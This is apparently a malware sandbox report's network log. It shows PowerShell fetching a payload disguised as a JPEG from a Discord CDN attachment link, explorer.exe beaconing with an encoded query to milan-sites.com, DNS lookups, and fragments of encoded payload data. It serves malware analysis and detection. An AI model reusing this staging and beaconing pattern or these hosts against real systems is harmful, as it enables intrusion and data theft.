                                                      Dec 2, 2021 18:26:37.745543003 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745553017 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.745632887 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745718956 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.745728016 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745735884 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.745749950 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745831966 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.745839119 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.745846987 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.746026039 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.750933886 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.751059055 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.751095057 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.751105070 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.751225948 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.751831055 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.752295017 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.752417088 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.752448082 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.752480984 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.752551079 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.752574921 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.752742052 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.752866030 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.752882957 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.753021955 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.753982067 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754095078 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754126072 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754137039 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754219055 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754224062 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754333973 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754441977 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754489899 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754498959 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754524946 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754574060 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754700899 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754807949 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754832983 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754841089 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.754951000 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.754975080 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.755088091 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.755131960 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.755140066 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.755255938 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.763469934 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.763581038 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.763626099 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.763643026 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.763653994 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.763737917 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.763747931 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.763768911 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.763853073 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764008999 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764015913 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764024973 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764106035 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764197111 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764262915 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764269114 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764275074 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764277935 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764350891 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764368057 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764460087 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764724970 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764794111 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764801025 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764807940 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764811039 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764930964 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.764949083 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.764955044 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765073061 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765075922 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765151978 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765254974 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765256882 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765274048 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765419960 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765424013 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765441895 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765526056 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765659094 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765665054 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765671968 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765686989 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765747070 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765753031 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765759945 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765763044 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.765779018 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.765810966 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.805741072 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.805865049 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.805985928 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806049109 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806067944 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806082964 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806185961 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806188107 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806209087 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806314945 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806375980 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806405067 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806415081 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806442976 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806480885 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806508064 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806588888 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806623936 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806751966 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.806869030 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.806988001 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807039022 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807059050 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807073116 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807184935 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807300091 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807308912 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807328939 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807337046 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807420969 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807429075 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807451963 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807516098 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807636023 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807707071 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807714939 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807728052 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807733059 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807738066 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807827950 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807897091 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807940006 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807949066 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.807955027 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.807965994 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808015108 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808082104 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808103085 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808111906 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808119059 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808129072 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808135033 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808161020 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808165073 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808204889 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808269024 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808391094 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808459044 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808521032 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808532953 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808542967 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808547974 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808578968 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808619976 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808631897 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808661938 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808700085 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808708906 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808716059 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808733940 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808744907 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808815002 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808900118 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808912039 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808923006 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808928013 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808954000 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.808958054 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.808967113 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809030056 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809055090 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809058905 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809077978 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809138060 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809146881 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809151888 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809159040 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809190035 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:26:37.809211016 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.809240103 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.843626022 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.883446932 CET49165443192.168.2.22162.159.135.233
                                                      Dec 2, 2021 18:26:37.883475065 CET44349165162.159.135.233192.168.2.22
                                                      Dec 2, 2021 18:28:23.687527895 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:23.934154034 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:23.934355974 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:23.934557915 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.180543900 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.193949938 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.194021940 CET804916747.241.96.113192.168.2.22
                                                      Dec 2, 2021 18:28:24.194272995 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.194363117 CET4916780192.168.2.2247.241.96.113
                                                      Dec 2, 2021 18:28:24.440359116 CET804916747.241.96.113192.168.2.22

                                                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 18:26:36.163012981 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 18:26:36.190970898 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Dec 2, 2021 18:26:36.196990013 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 18:26:36.224750042 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Dec 2, 2021 18:26:37.210226059 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 18:26:37.232888937 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Dec 2, 2021 18:28:03.277404070 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 18:28:03.306587934 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Dec 2, 2021 18:28:23.495855093 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 18:28:23.679661036 CET | 53 | 59185 | 8.8.8.8 | 192.168.2.22

                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 2, 2021 18:26:36.163012981 CET | 192.168.2.22 | 8.8.8.8 | 0x9e6 | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:36.196990013 CET | 192.168.2.22 | 8.8.8.8 | 0x782a | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.210226059 CET | 192.168.2.22 | 8.8.8.8 | 0xbc48 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:28:03.277404070 CET | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.foodcartgps.net | A (IP address) | IN (0x0001)
Dec 2, 2021 18:28:23.495855093 CET | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.milan-sites.com | A (IP address) | IN (0x0001)

                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 2, 2021 18:26:36.190970898 CET | 8.8.8.8 | 192.168.2.22 | 0x9e6 | No error (0) | google.com |  | 216.58.215.238 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:36.224750042 CET | 8.8.8.8 | 192.168.2.22 | 0x782a | No error (0) | google.com |  | 216.58.215.238 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET | 8.8.8.8 | 192.168.2.22 | 0xbc48 | No error (0) | cdn.discordapp.com |  | 162.159.135.233 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET | 8.8.8.8 | 192.168.2.22 | 0xbc48 | No error (0) | cdn.discordapp.com |  | 162.159.134.233 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET | 8.8.8.8 | 192.168.2.22 | 0xbc48 | No error (0) | cdn.discordapp.com |  | 162.159.129.233 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET | 8.8.8.8 | 192.168.2.22 | 0xbc48 | No error (0) | cdn.discordapp.com |  | 162.159.133.233 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:26:37.232888937 CET | 8.8.8.8 | 192.168.2.22 | 0xbc48 | No error (0) | cdn.discordapp.com |  | 162.159.130.233 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:28:03.306587934 CET | 8.8.8.8 | 192.168.2.22 | 0xfc43 | Name error (3) | www.foodcartgps.net | none | none | A (IP address) | IN (0x0001)
Dec 2, 2021 18:28:23.679661036 CET | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.milan-sites.com |  | 47.241.96.113 | A (IP address) | IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com
                                                      • www.milan-sites.com

                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 162.159.135.233 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 47.241.96.113 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:28:23.934557915 CET | 1951 | OUT | GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1
                                                      Host: www.milan-sites.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Dec 2, 2021 18:28:24.193949938 CET | 1951 | IN | HTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Thu, 02 Dec 2021 17:28:24 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: /
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 162.159.135.233 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-02 17:26:37 UTC | 0 | OUT | GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
2021-12-02 17:26:37 UTC | 0 | IN | HTTP/1.1 200 OK
                                                      Date: Thu, 02 Dec 2021 17:26:37 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1920730
                                                      Connection: close
                                                      CF-Ray: 6b7642e54c562b16-FRA
                                                      Accept-Ranges: bytes
                                                      Age: 34781
                                                      Cache-Control: public, max-age=31536000
                                                      ETag: "de726dd453796b237393f7e160eb25e2"
                                                      Expires: Fri, 02 Dec 2022 17:26:37 GMT
                                                      Last-Modified: Thu, 02 Dec 2021 02:59:05 GMT
                                                      CF-Cache-Status: HIT
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Cf-Bgj: h2pri
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      x-goog-generation: 1638413945526918
                                                      x-goog-hash: crc32c=ziGBiQ==
                                                      x-goog-hash: md5=3nJt1FN5ayNzk/fhYOsl4g==
                                                      x-goog-metageneration: 1
                                                      x-goog-storage-class: STANDARD
                                                      x-goog-stored-content-encoding: identity
                                                      x-goog-stored-content-length: 1920730
                                                      X-GUploader-UploadID: ADPycdtOSUidk_80tzHe3TlG8PYi8QYnojg95PvSsXIJW1mjMpAdWZBGuKmDVfVzmIG0crwn_112m2vXYrH1XJmsMs4
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AQJ%2BdaFGkk%2BJSHgGzsXo2NZR%2F%2FpxrHCydudUI3eCZni27nZGoVPe8YJjrHnXLzIWmJm%2FtyaEmdoddTPI%2F0ToFquJEMOg4pAodsVOJTbvjdFZoWHZdF9J7uzW0a6qjkAIEL8UBw%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-12-02 17:26:37 UTC | 1 | IN | Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                      Data Ascii: GLGBFQyxgRkUsYDM2LGBCRixgRTUsYEFGLGA0NyxgRUYsYEVDLGBGRSxgNTQsYEZELGA0RixgNzcsYERFLGBGOSxgMTMsYEYwLGBDRSxgRkYsYEYyLGBGQSxgMUYsYEY4LGBFNyxgRDMsYDdGLGBGRCxgRDcsYEY5LGBGQixgRkYsYDcyLGBGRixgOUQsYEVELGBERixgMjAsYEZELGA1NSxgQ0IsYEQ5LGA2RixgQ0UsYEZDLGBCMSxgRkQsYD
                                                      2021-12-02 17:26:37 UTC12INData Raw: 4e 55 55 73 59 44 4e 43 4c 47 42 47 4f 53 78 67 51 54 6b 73 59 45 52 47 4c 47 42 47 51 79 78 67 4d 6a 6b 73 59 44 68 45 4c 47 41 78 52 69 78 67 51 6a 41 73 59 45 5a 47 4c 47 42 42 51 53 78 67 4e 30 59 73 59 45 59 77 4c 47 42 45 4f 53 78 67 52 6a 4d 73 59 45 59 30 4c 47 42 47 4d 79 78 67 4d 30 59 73 59 45 56 43 4c 47 41 35 52 69 78 67 4d 45 4d 73 59 45 45 32 4c 47 41 32 4e 79 78 67 52 54 63 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59 44 64 47 4c 47 42 45 51 69 78 67 52 45 59 73 59 45 5a 43 4c 47 42 43 4e 79 78 67 52 6b 4d 73 59 44 63 31 4c 47 42 42 4f 53 78 67 52 54 55 73 59 45 4e 46 4c 47 41 30 52 69 78 67 52 44 55 73 59 44 64 47 4c 47 41 32 4d 53 78 67 51 54 63 73 59 44 67 7a 4c 47 42 47 52 69 78 67 52 55 55 73 59 44 64 47 4c 47 42 42 4e 79 78
                                                      Data Ascii: NUUsYDNCLGBGOSxgQTksYERGLGBGQyxgMjksYDhELGAxRixgQjAsYEZGLGBBQSxgN0YsYEYwLGBEOSxgRjMsYEY0LGBGMyxgM0YsYEVCLGA5RixgMEMsYEE2LGA2NyxgRTcsYDM3LGBGRixgNzUsYDdGLGBEQixgREYsYEZCLGBCNyxgRkMsYDc1LGBBOSxgRTUsYENFLGA0RixgRDUsYDdGLGA2MSxgQTcsYDgzLGBGRixgRUUsYDdGLGBBNyx
                                                      2021-12-02 17:26:37 UTC13INData Raw: 47 41 32 52 53 78 67 52 55 49 73 59 45 4a 47 4c 47 42 47 52 53 78 67 52 6a 45 73 59 44 5a 47 4c 47 41 35 4d 43 78 67 52 6b 55 73 59 44 5a 45 4c 47 42 43 52 69 78 67 51 30 59 73 59 44 64 47 4c 47 41 35 4e 53 78 67 4d 7a 4d 73 59 45 51 33 4c 47 41 33 52 53 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 52 55 59 73 59 45 52 46 4c 47 41 33 4f 53 78 67 52 6a 45 73 59 44 4a 47 4c 47 42 47 51 79 78 67 4e 54 55 73 59 45 51 77 4c 47 41 31 4d 43 78 67 52 6b 59 73 59 45 59 7a 4c 47 41 7a 52 69 78 67 51 6a 51 73 59 44 64 43 4c 47 42 45 4e 79 78 67 52 54 4d 73 59 45 45 78 4c 47 41 7a 52 69 78 67 4d 44 59 73 59 45 51 77 4c 47 41 34 51 53 78 67 4e 55 59 73 59 45 59 77 4c 47 41 35 51 69 78 67 52 6b 55 73 59 45 46 45 4c 47 42 46 4f 53 78 67 4d 55 59 73 59 45 5a 42
